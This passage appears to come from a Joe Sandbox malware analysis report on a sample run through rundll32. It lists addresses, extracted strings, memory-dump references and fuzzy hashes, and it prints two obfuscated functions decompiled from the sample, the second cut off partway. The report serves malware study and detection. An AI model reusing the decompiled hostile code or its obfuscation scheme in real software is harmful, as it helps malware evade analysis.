0x0044bec2
0x0044becf
0x0044bedb
0x0044bee4
0x0044bee5
0x0044bee9
0x0044bef1
0x0044bef9
0x0044befd
0x0044bf05
0x0044bf0d
0x0044bf1b
0x0044bf1f
0x0044bf24
0x0044bf2c
0x0044bf2c
0x0044bf31
0x0044bf31
0x0044bf31
0x0044bf36
0x00000000
0x0044bf36
0x0044bf48
0x00000000
0x0044c0bf
0x0044bf54
0x0044c03b
0x0044c040
0x0044c043
0x0044c046
0x0044c04d
0x0044c052
0x0044c057
0x00000000
0x0044c057
0x0044bf60
0x0044bfd6
0x0044bfe9
0x0044bfee
0x0044bff1
0x0044bff4
0x0044bff6
0x0044bf95
0x0044bf95
0x0044bf2c
0x0044bf2c
0x0044bf31
0x0044bf31
0x00000000
0x0044bf31
0x0044bf2c
0x0044c00e
0x0044c013
0x0044c01e
0x0044c023
0x0044c026
0x0044bf2c
0x0044bf2c
0x00000000
0x0044bf2c
0x0044bf2c
0x0044bf64
0x0044bf9c
0x0044bfa4
0x0044bfa8
0x0044bfa9
0x0044bfaf
0x0044bfb7
0x0044bfbc
0x0044bfbf
0x0044bfc2
0x0044bfc9
0x0044bfce
0x00000000
0x0044bfce
0x0044bf68
0x0044c09e
0x0044c0a1
0x0044c0a6
0x0044c0a8
0x00000000
0x0044c0a8
0x0044bf74
0x00000000
0x00000000
0x0044bf8d
0x0044bf92
0x00000000
0x0044bf92
0x0044c067
0x0044c06a
0x0044c070
0x0044c073
0x0044c075
0x0044c081
0x0044c08b
0x00000000
0x0044c08b
0x0044c077
0x00000000
0x0044c090
0x0044c090
0x0044c090
0x00000000
0x0044bf36
0x0044bf31

Strings

f, xrefs: 0044BC8E
'B, xrefs: 0044BC9E
UV$#, xrefs: 0044C08B
Vh, xrefs: 0044BE95
UV$#, xrefs: 0044BF31
UV$#, xrefs: 0044C04D
Z', xrefs: 0044BEBA
qy, xrefs: 0044BBF4
Z}, xrefs: 0044BE75
K&, xrefs: 0044BDAD
n, xrefs: 0044BEFD
]n, xrefs: 0044BDA5
,6, xrefs: 0044BF0D

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'B$,6$K&$UV$#$UV$#$UV$#$Vh$Z'$Z}$]n$qy$n$f
API String ID: 0-847790408
Opcode ID: 9f79d09596b37f768330ebb540fa4dc2a8d23ccaafc00cb6302accd21621f0ce
Instruction ID: e4be825a295db4cd38d8e1ab69277b1ed5a35381a2e40f7562355c2e04715956
Opcode Fuzzy Hash: 9f79d09596b37f768330ebb540fa4dc2a8d23ccaafc00cb6302accd21621f0ce
Instruction Fuzzy Hash: 37C133719083419FE358CF25D88A40BFBE2BBC4708F10991DF59A962A0D7B9C949CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0018B165, Relevance: 16.5, Strings: 13, Instructions: 269COMMON

Download Yara Rule

Strings

,6, xrefs: 0018B481
'B, xrefs: 0018B212
UV$#, xrefs: 0018B5FF
Z', xrefs: 0018B42E
Z}, xrefs: 0018B3E9
Vh, xrefs: 0018B409
qy, xrefs: 0018B168
UV$#, xrefs: 0018B4A5
n, xrefs: 0018B471
K&, xrefs: 0018B321
]n, xrefs: 0018B319
UV$#, xrefs: 0018B5C1
f, xrefs: 0018B202

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'B$,6$K&$UV$#$UV$#$UV$#$Vh$Z'$Z}$]n$qy$n$f
API String ID: 0-847790408
Opcode ID: d18db09b0faadfb061b988d01f744b8e64b01c7cb996795b6b3781eb3c0fd8c2
Instruction ID: b9b8f32df44ad216756894e72f4fbfc1edf999b3e47b6a54f8bf14a016fd74f9
Opcode Fuzzy Hash: d18db09b0faadfb061b988d01f744b8e64b01c7cb996795b6b3781eb3c0fd8c2
Instruction Fuzzy Hash: 10C1327190C3419FE358CF25C48A40BFBE2BBD4718F509A1DF59A9A2A0D7B5CA45CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00443590, Relevance: 15.4, Strings: 12, Instructions: 440
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00443590() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				void* _t494;
				signed int _t495;
				signed int _t498;
				void* _t507;
				signed int _t518;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				void* _t536;
				void* _t538;
				void* _t590;
				signed int* _t595;

				_t595 =  &_v1772;
				_v1576 = 0xd2493;
				_v1564 = 0;
				_v1572 = 0x5ead38;
				_v1568 = 0x4896fd;
				_v1724 = 0xb66c;
				_v1584 = 0;
				_t590 = 0x184e3bc6;
				_t521 = 0x45;
				_v1724 = _v1724 / _t521;
				_v1724 = _v1724 + 0x610;
				_v1724 = _v1724 >> 3;
				_v1724 = _v1724 ^ 0x0000013f;
				_v1616 = 0x7825;
				_t522 = 0x7d;
				_v1616 = _v1616 / _t522;
				_v1616 = _v1616 ^ 0x800000f7;
				_v1648 = 0x6e2f;
				_v1648 = _v1648 >> 0xb;
				_v1648 = _v1648 ^ 0x0000000f;
				_v1696 = 0x5cc1;
				_v1696 = _v1696 << 5;
				_v1696 = _v1696 | 0x9962b7ae;
				_v1696 = _v1696 ^ 0x996b80cb;
				_v1704 = 0xab0e;
				_t523 = 0x26;
				_v1704 = _v1704 / _t523;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 ^ 0x000171c2;
				_v1732 = 0xff6;
				_v1732 = _v1732 + 0xfe15;
				_v1732 = _v1732 + 0x96bf;
				_v1732 = _v1732 << 0xa;
				_v1732 = _v1732 ^ 0x0693792e;
				_v1708 = 0xab38;
				_v1708 = _v1708 | 0x290ab240;
				_v1708 = _v1708 ^ 0x3d842594;
				_v1708 = _v1708 ^ 0x148ed7f1;
				_v1740 = 0xabf1;
				_v1740 = _v1740 + 0x6b39;
				_t524 = 0x4d;
				_v1740 = _v1740 * 0x17;
				_v1740 = _v1740 / _t524;
				_v1740 = _v1740 ^ 0x00001e9b;
				_v1632 = 0xc8c7;
				_v1632 = _v1632 | 0x1dddad59;
				_v1632 = _v1632 ^ 0x1ddda3fd;
				_v1728 = 0x1984;
				_v1728 = _v1728 | 0xe50174fc;
				_v1728 = _v1728 >> 9;
				_v1728 = _v1728 + 0x6ab5;
				_v1728 = _v1728 ^ 0x0072ca13;
				_v1680 = 0xee20;
				_v1680 = _v1680 + 0x6894;
				_v1680 = _v1680 + 0xffff3cc6;
				_v1680 = _v1680 ^ 0x0000b209;
				_v1768 = 0xd586;
				_v1768 = _v1768 * 0x1f;
				_t525 = 0x5b;
				_v1768 = _v1768 / _t525;
				_v1768 = _v1768 >> 9;
				_v1768 = _v1768 ^ 0x00007c3b;
				_v1720 = 0x39b3;
				_v1720 = _v1720 + 0xffff1073;
				_v1720 = _v1720 ^ 0x7e8b47a9;
				_v1720 = _v1720 ^ 0xe8576451;
				_v1720 = _v1720 ^ 0x69231483;
				_v1592 = 0x2734;
				_t526 = 0x59;
				_v1592 = _v1592 * 0x5a;
				_v1592 = _v1592 ^ 0x000db9de;
				_v1752 = 0xd37e;
				_v1752 = _v1752 + 0xffff3b06;
				_v1752 = _v1752 | 0x8ba20300;
				_v1752 = _v1752 + 0xffff0a7e;
				_v1752 = _v1752 ^ 0x8ba122a9;
				_v1736 = 0xfdf5;
				_v1736 = _v1736 ^ 0x4b0a6dd0;
				_v1736 = _v1736 * 0x59;
				_v1736 = _v1736 + 0xffff8d92;
				_v1736 = _v1736 ^ 0x16abd156;
				_v1700 = 0xf9fc;
				_v1700 = _v1700 / _t526;
				_t527 = 0x24;
				_v1700 = _v1700 * 0x7a;
				_v1700 = _v1700 ^ 0x000160f5;
				_v1760 = 0x6097;
				_v1760 = _v1760 + 0x9028;
				_v1760 = _v1760 | 0x26d284d4;
				_v1760 = _v1760 + 0xffff62d1;
				_v1760 = _v1760 ^ 0x26d24200;
				_v1668 = 0x58a3;
				_v1668 = _v1668 / _t527;
				_v1668 = _v1668 | 0xce2be8fd;
				_v1668 = _v1668 ^ 0xce2b9730;
				_v1588 = 0x5dca;
				_v1588 = _v1588 | 0xcb121239;
				_v1588 = _v1588 ^ 0xcb12429b;
				_v1640 = 0xc4d;
				_v1640 = _v1640 ^ 0x11c7ddf0;
				_v1640 = _v1640 ^ 0x11c7841c;
				_v1676 = 0x21f1;
				_v1676 = _v1676 ^ 0x843604aa;
				_v1676 = _v1676 ^ 0x2f7d7e62;
				_v1676 = _v1676 ^ 0xab4b14fa;
				_v1596 = 0xafc7;
				_v1596 = _v1596 << 5;
				_v1596 = _v1596 ^ 0x0015f7ef;
				_v1692 = 0x8fa7;
				_t528 = 0x5a;
				_v1692 = _v1692 * 0x7c;
				_v1692 = _v1692 + 0x4cbf;
				_v1692 = _v1692 ^ 0x004598ea;
				_v1744 = 0x9dac;
				_v1744 = _v1744 | 0xb7a8ffb3;
				_v1744 = _v1744 / _t528;
				_v1744 = _v1744 ^ 0x020a4ecc;
				_v1652 = 0x6ace;
				_v1652 = _v1652 << 9;
				_v1652 = _v1652 ^ 0x00d5de13;
				_v1660 = 0xce58;
				_t529 = 3;
				_v1660 = _v1660 / _t529;
				_v1660 = _v1660 ^ 0xb363bbfe;
				_v1660 = _v1660 ^ 0xb36386d8;
				_v1748 = 0x5863;
				_v1748 = _v1748 | 0xab415f7d;
				_t530 = 0x38;
				_v1748 = _v1748 * 0x69;
				_v1748 = _v1748 ^ 0x3fd727f3;
				_v1748 = _v1748 ^ 0x020739d0;
				_v1608 = 0xb7;
				_v1608 = _v1608 + 0xffffc806;
				_v1608 = _v1608 ^ 0xffffd476;
				_v1600 = 0x1ae1;
				_v1600 = _v1600 / _t530;
				_v1600 = _v1600 ^ 0x00002061;
				_v1756 = 0x997c;
				_v1756 = _v1756 + 0xf405;
				_v1756 = _v1756 >> 4;
				_v1756 = _v1756 << 1;
				_v1756 = _v1756 ^ 0x0000255b;
				_v1764 = 0x43d1;
				_v1764 = _v1764 + 0x2011;
				_v1764 = _v1764 >> 6;
				_v1764 = _v1764 + 0xffff3985;
				_v1764 = _v1764 ^ 0xffff5831;
				_v1772 = 0x27fc;
				_v1772 = _v1772 << 4;
				_v1772 = _v1772 + 0xffff71df;
				_t531 = 0x70;
				_v1772 = _v1772 / _t531;
				_v1772 = _v1772 ^ 0x0000090e;
				_v1604 = 0xd94c;
				_t532 = 0x25;
				_v1604 = _v1604 * 0x68;
				_v1604 = _v1604 ^ 0x00581092;
				_v1624 = 0x5ea0;
				_v1624 = _v1624 * 0x74;
				_v1624 = _v1624 ^ 0x002af6cb;
				_v1636 = 0x3082;
				_v1636 = _v1636 >> 6;
				_v1636 = _v1636 ^ 0x00003692;
				_v1644 = 0x999e;
				_v1644 = _v1644 | 0x39006ece;
				_v1644 = _v1644 ^ 0x3900e31d;
				_v1684 = 0x1097;
				_v1684 = _v1684 | 0x83c0eeba;
				_v1684 = _v1684 / _t532;
				_v1684 = _v1684 ^ 0x038f86d4;
				_v1712 = 0xa774;
				_v1712 = _v1712 + 0xffffc475;
				_v1712 = _v1712 | 0x6e7db387;
				_v1712 = _v1712 ^ 0x6e7dd3da;
				_v1688 = 0xa5c3;
				_v1688 = _v1688 ^ 0xe96270b2;
				_v1688 = _v1688 * 0x25;
				_v1688 = _v1688 ^ 0xbb48b417;
				_v1612 = 0x2ed1;
				_t533 = 0x2c;
				_v1612 = _v1612 / _t533;
				_v1612 = _v1612 ^ 0x00007f35;
				_v1620 = 0x6bc9;
				_v1620 = _v1620 | 0x4f77e0ce;
				_v1620 = _v1620 ^ 0x4f778e3b;
				_v1672 = 0x5319;
				_v1672 = _v1672 | 0xbd54dbc0;
				_t534 = 0x61;
				_v1672 = _v1672 / _t534;
				_v1672 = _v1672 ^ 0x01f3c105;
				_v1628 = 0x8018;
				_v1628 = _v1628 << 0xb;
				_v1628 = _v1628 ^ 0x0400ec78;
				_v1716 = 0x3982;
				_v1716 = _v1716 | 0xa6eae1a8;
				_v1716 = _v1716 + 0xa320;
				_v1716 = _v1716 + 0xffffdd5b;
				_v1716 = _v1716 ^ 0xa6eb35eb;
				_v1656 = 0xdd8c;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 + 0xffff2d32;
				_v1656 = _v1656 ^ 0xffff529e;
				_v1664 = 0xdc2e;
				_v1664 = _v1664 ^ 0x013d526f;
				_t535 = 0x14;
				_t518 = _v1584;
				_v1664 = _v1664 / _t535;
				_v1664 = _v1664 ^ 0x000fe0b7;
				while(1) {
					L1:
					_t536 = 0x5c;
					while(1) {
						L2:
						_t494 = 0x161f11dd;
						do {
							L3:
							if(_t590 == _t494) {
								_t495 = E0044232B(_v1712,  &_v1560, _v1688);
								_pop(_t538);
								_t498 = E004341AA(_v1580, _v1612, _v1664, _t538, _t518, _v1620, _v1672, _v1628,  &_v1560, 2 + _t495 * 2);
								_t595 =  &(_t595[8]);
								__eflags = _t498;
								_t590 = 0x2ed72160;
								_t451 = _t498 == 0;
								__eflags = _t451;
								_v1584 = 0 | _t451;
								goto L19;
							} else {
								if(_t590 == 0x184e3bc6) {
									_push(_t536);
									E0043471A(_v1724,  &_v520, _v1696, _v1704, _v1732, _v1708, _v1740);
									_t595 =  &(_t595[8]);
									_t590 = 0x26d2b2b4;
									goto L1;
								} else {
									if(_t590 == 0x1977399b) {
										_push(0x431368);
										_push(_v1652);
										_push(_v1744);
										_t542 = _v1596;
										__eflags = E00440A84(E00435DFC(_v1596, _v1692, __eflags), _v1660, _v1648, _v1748, _v1608, _v1596, _v1600, _v1596,  &_v1580, _v1616, _t542, _t542, _v1756, _v1764, _v1772, _v1604, _t542, _v1624);
										_t590 =  ==  ? 0x161f11dd : 0x12170868;
										E00440D6D(_v1636, _v1644, _v1684, _t502);
										_t595 =  &(_t595[0x15]);
										L19:
										_t494 = 0x161f11dd;
										_t536 = 0x5c;
										goto L20;
									} else {
										if(_t590 == 0x1bdb9a1c) {
											_t520 =  *0x451088 + 0x38;
											while(1) {
												__eflags =  *_t520 - _t536;
												if(__eflags == 0) {
													break;
												}
												_t520 = _t520 + 2;
												__eflags = _t520;
											}
											_t518 = _t520 + 2;
											_t590 = 0x1977399b;
											goto L2;
										} else {
											if(_t590 == 0x26d2b2b4) {
												_push(0x431308);
												_push(_v1768);
												_push(_v1680);
												_t507 = E00435DFC(_v1632, _v1728, __eflags);
												E0044D4E1( &_v1040, __eflags);
												E004398C5(0x104, __eflags, _v1720, _v1592, _v1752, _v1736, _v1700,  *0x451088 + 0x254, _v1760, _v1668,  &_v1040,  *0x451088 + 0x38, _t507,  &_v520);
												E00440D6D(_v1588, _v1640, _v1676, _t507);
												_t595 =  &(_t595[0x11]);
												_t590 = 0x1bdb9a1c;
												while(1) {
													L1:
													_t536 = 0x5c;
													L2:
													_t494 = 0x161f11dd;
													goto L3;
												}
											} else {
												if(_t590 != 0x2ed72160) {
													goto L20;
												} else {
													E004470CF(_v1716, _v1656, _v1580);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1584;
							L20:
							__eflags = _t590 - 0x12170868;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}

0x00443590
0x00443596
0x004435a3
0x004435ac
0x004435b7
0x004435c2
0x004435ce
0x004435d5
0x004435e0
0x004435e5
0x004435eb
0x004435f3
0x004435f8
0x00443600
0x00443612
0x00443617
0x00443620
0x0044362b
0x00443636
0x0044363e
0x00443646
0x0044364e
0x00443653
0x0044365b
0x00443663
0x0044366f
0x00443674
0x0044367a
0x0044367f
0x00443687
0x0044368f
0x00443697
0x0044369f
0x004436a4
0x004436ac
0x004436b4
0x004436bc
0x004436c4
0x004436cc
0x004436d4
0x004436e1
0x004436e2
0x004436ec
0x004436f0
0x004436f8
0x00443703
0x0044370e
0x00443719
0x00443721
0x00443729
0x0044372e
0x00443736
0x0044373e
0x00443746
0x0044374e
0x00443756
0x0044375e
0x0044376b
0x00443777
0x0044377c
0x00443782
0x00443787
0x0044378f
0x00443797
0x0044379f
0x004437a7
0x004437af
0x004437b7
0x004437ca
0x004437cd
0x004437d4
0x004437df
0x004437e7
0x004437ef
0x004437f7
0x004437ff
0x00443807
0x0044380f
0x0044381c
0x00443820
0x00443828
0x00443830
0x00443840
0x00443849
0x0044384c
0x00443850
0x00443858
0x00443860
0x00443868
0x00443870
0x00443878
0x00443880
0x00443890
0x00443894
0x0044389c
0x004438a4
0x004438af
0x004438ba
0x004438c5
0x004438d0
0x004438db
0x004438e6
0x004438ee
0x004438f6
0x004438fe
0x00443906
0x00443911
0x00443919
0x00443924
0x00443931
0x00443932
0x00443936
0x0044393e
0x00443946
0x0044394e
0x0044395c
0x00443960
0x00443968
0x00443973
0x0044397b
0x00443986
0x0044399c
0x004439a1
0x004439aa
0x004439b5
0x004439c0
0x004439c8
0x004439d5
0x004439d8
0x004439dc
0x004439e4
0x004439ec
0x004439f7
0x00443a02
0x00443a0d
0x00443a23
0x00443a2a
0x00443a35
0x00443a3d
0x00443a45
0x00443a4a
0x00443a4e
0x00443a56
0x00443a5e
0x00443a66
0x00443a6b
0x00443a73
0x00443a7b
0x00443a83
0x00443a88
0x00443a94
0x00443a99
0x00443a9f
0x00443aa7
0x00443aba
0x00443abb
0x00443ac2
0x00443acd
0x00443ae0
0x00443ae7
0x00443af2
0x00443afd
0x00443b05
0x00443b10
0x00443b1b
0x00443b26
0x00443b31
0x00443b39
0x00443b47
0x00443b4b
0x00443b53
0x00443b5b
0x00443b63
0x00443b6b
0x00443b73
0x00443b7b
0x00443b88
0x00443b8c
0x00443b96
0x00443baa
0x00443baf
0x00443bb8
0x00443bc8
0x00443bd3
0x00443bde
0x00443be9
0x00443bf1
0x00443bfd
0x00443c02
0x00443c08
0x00443c10
0x00443c1b
0x00443c23
0x00443c2e
0x00443c36
0x00443c3e
0x00443c46
0x00443c4e
0x00443c56
0x00443c61
0x00443c69
0x00443c74
0x00443c7f
0x00443c8a
0x00443c9c
0x00443c9f
0x00443ca6
0x00443caa
0x00443cb2
0x00443cb2
0x00443cb4
0x00443cb5
0x00443cb5
0x00443cb5
0x00443cba
0x00443cba
0x00443cbc
0x00443ed9
0x00443ede
0x00443f1b
0x00443f22
0x00443f25
0x00443f27
0x00443f2c
0x00443f2c
0x00443f2f
0x00000000
0x00443cc2
0x00443cc8
0x00443e97
0x00443eb8
0x00443ebd
0x00443ec0
0x00000000
0x00443cce
0x00443cd0
0x00443deb
0x00443df0
0x00443df7
0x00443dff
0x00443e65
0x00443e87
0x00443e8a
0x00443e8f
0x00443f36
0x00443f38
0x00443f3d
0x00000000
0x00443cd6
0x00443cdc
0x00443dd4
0x00443ddc
0x00443ddc
0x00443ddf
0x00000000
0x00000000
0x00443dd9
0x00443dd9
0x00443dd9
0x00443de1
0x00443de4
0x00000000
0x00443ce2
0x00443ce8
0x00443d20
0x00443d25
0x00443d29
0x00443d38
0x00443d46
0x00443da1
0x00443dbc
0x00443dc1
0x00443dc4
0x00443cb2
0x00443cb2
0x00443cb4
0x00443cb5
0x00443cb5
0x00000000
0x00443cb5
0x00443cea
0x00443cf0
0x00000000
0x00443cf6
0x00443d08
0x00443d0d
0x00443cf0
0x00443ce8
0x00443cdc
0x00443cd0
0x00443cc8
0x00443d0e
0x00443d1f
0x00443f3e
0x00443f3e
0x00443f3e
0x00000000
0x00443f4a
0x00443cb5

Strings

QdW, xrefs: 004437A7
;|, xrefs: 00443787
, xrefs: 0044373E
a , xrefs: 00443A2A
4', xrefs: 004437B7
9k, xrefs: 004436D4
x, xrefs: 00443C23
[%, xrefs: 00443A4E
b~}/, xrefs: 004438F6
%x, xrefs: 00443600
cX, xrefs: 004439C0
/n, xrefs: 0044362B

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $%x$/n$4'$9k$;|$QdW$[%$a $b~}/$cX$x
API String ID: 0-2114610450
Opcode ID: 06de4fb89cbae4b4b082251ad0258b91a57ebd43036dfa221ea2ef0107208ecd
Instruction ID: 02766e293dddc99c26e45f80863df90de95606eb0608d1af174c2a6e5657e5ac
Opcode Fuzzy Hash: 06de4fb89cbae4b4b082251ad0258b91a57ebd43036dfa221ea2ef0107208ecd
Instruction Fuzzy Hash: 0532127150D380DFE368CF25D88AB9BBBE2BBC5704F10891DE199862A0D7B59949CF07

Uniqueness

Uniqueness Score: -1.00%

Function 00447187, Relevance: 15.4, Strings: 12, Instructions: 369
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00447187(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr* _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _t406;
				signed int _t410;
				void* _t417;
				intOrPtr _t433;
				intOrPtr* _t436;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				intOrPtr _t485;
				void* _t486;
				intOrPtr* _t493;
				signed int* _t494;
				signed int* _t495;
				signed int* _t496;

				_t436 = __ecx;
				_t494 =  &_v320;
				_v144 = 0x3f72af;
				_v136 = 0;
				_v132 = 0;
				_v140 = 0x419dab;
				_v172 = 0xb463;
				_v148 = __edx;
				_t486 = 0x2fd49363;
				_v152 = __ecx;
				_t478 = 0x59;
				_v172 = _v172 / _t478;
				_v172 = _v172 ^ 0x00001d3c;
				_v212 = 0x8309;
				_v212 = _v212 | 0x8582e029;
				_v212 = _v212 ^ 0x8582ffb6;
				_v196 = 0x538d;
				_v196 = _v196 | 0x45df7b90;
				_v196 = _v196 ^ 0x45df0507;
				_v220 = 0x862c;
				_v220 = _v220 + 0xb39a;
				_v220 = _v220 ^ 0x00010d91;
				_v232 = 0x9f44;
				_v232 = _v232 ^ 0x181d052d;
				_t479 = 0x60;
				_v232 = _v232 / _t479;
				_v232 = _v232 ^ 0x00407958;
				_v164 = 0x87c0;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x000420a8;
				_v252 = 0x893b;
				_v252 = _v252 + 0xffff57e5;
				_v252 = _v252 + 0xffff4235;
				_v252 = _v252 ^ 0xffff2531;
				_v228 = 0xe4b4;
				_v228 = _v228 ^ 0x8f8823fd;
				_v228 = _v228 + 0xffffac51;
				_v228 = _v228 ^ 0x8f8836c7;
				_v292 = 0x30ec;
				_v292 = _v292 + 0xffff5b52;
				_v292 = _v292 + 0x6c9c;
				_v292 = _v292 << 0xa;
				_v292 = _v292 ^ 0xffe355d2;
				_v260 = 0x7acb;
				_v260 = _v260 + 0xffffa0ea;
				_v260 = _v260 | 0x99ee16c0;
				_v260 = _v260 ^ 0x99ee2715;
				_v236 = 0x660;
				_v236 = _v236 >> 3;
				_v236 = _v236 ^ 0xfad9dcdf;
				_v236 = _v236 ^ 0xfad9c9f6;
				_v188 = 0x2ec9;
				_v188 = _v188 * 0x1e;
				_v188 = _v188 ^ 0x00056cd6;
				_v176 = 0xdb2b;
				_v176 = _v176 + 0x1ae1;
				_v176 = _v176 ^ 0x0000f432;
				_v308 = 0x4019;
				_v308 = _v308 | 0x5723cddb;
				_v308 = _v308 << 6;
				_v308 = _v308 + 0xffff2d56;
				_v308 = _v308 ^ 0xc8f2fe5d;
				_v168 = 0x4395;
				_v168 = _v168 ^ 0x67ca4501;
				_v168 = _v168 ^ 0x67ca76df;
				_v264 = 0x84c6;
				_v264 = _v264 | 0x00adff5b;
				_v264 = _v264 + 0x6303;
				_v264 = _v264 ^ 0x00ae478b;
				_v244 = 0x4752;
				_v244 = _v244 + 0x93ca;
				_v244 = _v244 >> 9;
				_v244 = _v244 ^ 0x00006083;
				_v160 = 0x645a;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0x00191e2a;
				_v276 = 0x9751;
				_v276 = _v276 << 8;
				_v276 = _v276 + 0xffff5caf;
				_t480 = 0xa;
				_v276 = _v276 / _t480;
				_v276 = _v276 ^ 0x000f67c9;
				_v180 = 0x8794;
				_v180 = _v180 << 2;
				_v180 = _v180 ^ 0x00025325;
				_v320 = 0x9a55;
				_v320 = _v320 << 0xf;
				_v320 = _v320 << 0xa;
				_t481 = 0x55;
				_v320 = _v320 * 0x4d;
				_v320 = _v320 ^ 0x22000a83;
				_v248 = 0xe379;
				_v248 = _v248 >> 7;
				_v248 = _v248 >> 0xc;
				_v248 = _v248 ^ 0x00003db5;
				_v284 = 0xccf8;
				_v284 = _v284 + 0x1e46;
				_v284 = _v284 * 0x38;
				_v284 = _v284 * 0x58;
				_v284 = _v284 ^ 0x11b007cd;
				_v300 = 0x32ae;
				_v300 = _v300 << 2;
				_v300 = _v300 >> 0x10;
				_v300 = _v300 << 0xe;
				_v300 = _v300 ^ 0x00000792;
				_v216 = 0x5329;
				_v216 = _v216 + 0xb5c4;
				_v216 = _v216 ^ 0x00016a2e;
				_v256 = 0xf2a3;
				_v256 = _v256 / _t481;
				_v256 = _v256 >> 6;
				_v256 = _v256 ^ 0x00001717;
				_v304 = 0x96fc;
				_v304 = _v304 | 0xda0a5c24;
				_t482 = 0x2b;
				_v304 = _v304 * 0x37;
				_v304 = _v304 + 0xd389;
				_v304 = _v304 ^ 0xd856d340;
				_v240 = 0x24a9;
				_v240 = _v240 >> 0xf;
				_v240 = _v240 | 0xd0db0b52;
				_v240 = _v240 ^ 0xd0db68a6;
				_v312 = 0x7296;
				_v312 = _v312 << 5;
				_v312 = _v312 >> 0x10;
				_v312 = _v312 >> 0x10;
				_v312 = _v312 ^ 0x000057a1;
				_v204 = 0xffd2;
				_v204 = _v204 + 0x4d88;
				_v204 = _v204 ^ 0x000119e7;
				_v316 = 0x8b8b;
				_v316 = _v316 / _t482;
				_v316 = _v316 ^ 0x980bb32c;
				_v316 = _v316 ^ 0xc4a4ea1d;
				_v316 = _v316 ^ 0x5caf30c9;
				_v268 = 0x337b;
				_v268 = _v268 + 0x5b7d;
				_v268 = _v268 + 0x12aa;
				_v268 = _v268 ^ 0x0000b326;
				_v296 = 0xc10a;
				_v296 = _v296 + 0xffff865a;
				_v296 = _v296 + 0x4a11;
				_v296 = _v296 + 0xffff623b;
				_v296 = _v296 ^ 0xffffbd38;
				_v208 = 0x68d9;
				_v208 = _v208 << 0xa;
				_v208 = _v208 ^ 0x01a30f5d;
				_v192 = 0x7a63;
				_v192 = _v192 << 0xc;
				_v192 = _v192 ^ 0x07a656ca;
				_v200 = 0x6d3e;
				_v200 = _v200 << 7;
				_v200 = _v200 ^ 0x003687c2;
				_v288 = 0x5a10;
				_v288 = _v288 << 9;
				_t483 = 0x69;
				_v288 = _v288 / _t483;
				_v288 = _v288 + 0x4454;
				_v288 = _v288 ^ 0x0001df75;
				_v224 = 0x28de;
				_v224 = _v224 >> 0xa;
				_v224 = _v224 + 0xffff52ce;
				_v224 = _v224 ^ 0xffff05f8;
				_v272 = 0xab64;
				_v272 = _v272 + 0xfffffe6e;
				_v272 = _v272 >> 4;
				_v272 = _v272 ^ 0xa501867a;
